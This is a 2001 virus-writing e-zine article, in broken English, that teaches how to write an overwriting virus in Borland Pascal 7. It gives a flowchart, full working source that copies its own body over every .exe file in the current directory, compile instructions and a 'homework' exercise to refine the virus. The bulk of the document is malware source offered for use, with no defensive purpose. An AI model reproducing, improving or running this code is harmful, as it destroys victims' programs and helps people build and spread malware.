                              (my first e-zine) BKNY0NNX // SBVC (c) 27.10.2001
-------------------------------------------------------------------------------

	Writing the overwriting virus on Borland Pascal 7.00

 You have solved to write the virus, but that it there was on-more simply and
on-dangerous. I think that this will become you value ;)

 The virus possible to write in any language, but I has chosen BP7, because of
its simplicities and ample amount of programs on him.

 The Algorithm of our most primitiv virus is:

               ษอออออออออออออออป
               บOpen its file, บ
               บread viral bodyบ
               บand close it   บ
               ศออออออัออออออออผ
                      
               ษออออออฯออออออออป
               บFind first     บ
               บvictim         บ
               ศออออออัออออออออผ
                      
               ษออออออฯออออออออป
               บIf not found   บ
               บ      -        บฤฤฤฤฤฟ
               บ     exit      บ      ณ
               ศออออออัออออออออผ      ณ
                                     ณ
               ษออออออฯออออออออออป    ณ
               บOpen victim's    บ    ณ
               บfile, write virusบ    ณ
               บand close file   บ    ณ
               ศออออออัออออออออออผ    ณ
                                     ณ
               ษออออออฯออออออออออป    ณ
               บFind next        วฤฤฤฤู
               บvictim           บ
               ศอออออออออออออออออผ

 Essence its in that that it its body rewrites bodies of their own victims
(rewriting AKA overwriter)

 Here is and its source:

=====[CUT HERE]=====
(* Name of program *)
Program Trivial_1;

(* We shall use additional module, giving services for work with DOS *)
Uses Dos;

Const
	BodySize = 2608;	(* length of virus *)

Var
	F : File;		(* file variable for work with files *) DirInfo : SearchRec;	(* variable for searching for of files *) Body : Array [1..BodySize] of Byte; (* vault of body of virus *)

BEGIN

	Assign(F, ParamStr(0));	(* Preparation to opening itself: in ParamStr(0) - our name *) Reset(F, 1);		(* We Open... *) BlockRead(F, Body, BodySize); (* We Read its body *) Close(F);		(* We Close itself *)

	FindFirst('*.exe', AnyFile, DirInfo); (* We Search For first victim *)

	While DosError = 0 Do Begin (* If it was sewn on... *)

		Assign(F, DirInfo.Name); (* Preparation to opening of victim:
				in DirInfo.Name - name of victim *)
		ReWrite(F, 1);			(* We Rewrite *)
		BlockWrite(F, Body, BodySize);	(* We write our body *)
		Close(F);			(* We close *)

		FindNext(DirInfo);	(* We Search For necessarying victim *)
		End;

END.
=====[END CUT]======

The lines between =====[END HERE]===== and =====[END CUT]====== necessary to
slice, write in file, and this file to compile by means of Borland (Turbo)
Pascal 7.0. If length of got virus differs from BodySize, that BodySize to is
necessary change on length of got virus and compile the virus.

Task on house: ;)
  1. Understand the code of virus;
  2. Change the code to if length of victim more lengths of virus, length of victim did not change.

			Want the success!
